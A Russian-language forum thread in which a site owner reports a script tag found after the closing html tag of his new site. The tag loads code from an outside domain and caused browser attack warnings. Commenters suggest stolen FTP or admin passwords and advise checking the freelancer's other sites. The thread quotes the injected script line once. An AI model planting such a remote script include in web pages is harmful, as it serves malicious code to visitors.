Вопрос для программистов и не только

MS
На сайте с 16.07.2009
2
574

Привет, на днях один фрилансер закончил разработку сайта для меня, сегодня обнаружил скрипт в конце страницы после тега </html> :

<script src=http://musical-kleopatra.com/data/tail.sub.php ></script>

Из-за этого скрипта браузеры ругались на мой сайт, "предупреждали об отаки компьютера"

Сам скрипт я удалил, но не могу понять почему сам фрилансер впихнул этот скрипт на страничку моего сайта?

basilic
На сайте с 16.05.2008
369

Смотрите шире уважаемый!

Ваши глупые вопросы подталкивают к выводу о вашей некомпетентности в этом вопросе, скорее всего "вздернули" ваш сайт, а не фрилансер виноват. И СКОРЕЕ всего виноваты именно вы - храните пароли на листиках, они "не горят".

Лунный Кот
На сайте с 27.01.2006
222

С таким же успехом пароль могли украсть у самого фрилансера.

Вы мне свои достижения жизненные продемонстируйте, пожалуйста, я, возможно, возьму свои слова обратно и извинюсь прилюдно. Только думается мне, что вы банальный лась. (с) Mirson
HapKOTuK
На сайте с 23.08.2007
30
Лунный Кот:
С таким же успехом пароль могли украсть у самого фрилансера.

Если суть вопроса была "был ли злой умысел у фрилансера?" - то это не так важно.

Я бы попросил фрилансера посмотреть, нет ли подобных "добавок" на других сайтах к которым у него есть доступ. И если есть - пусть лечится от вирусов он. Если нет - пусть лечится ТС :)

Не будь слишком требователен к себе - будешь неудовлетворен. Не будь слишком требовательным к другим - разочаруешься.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий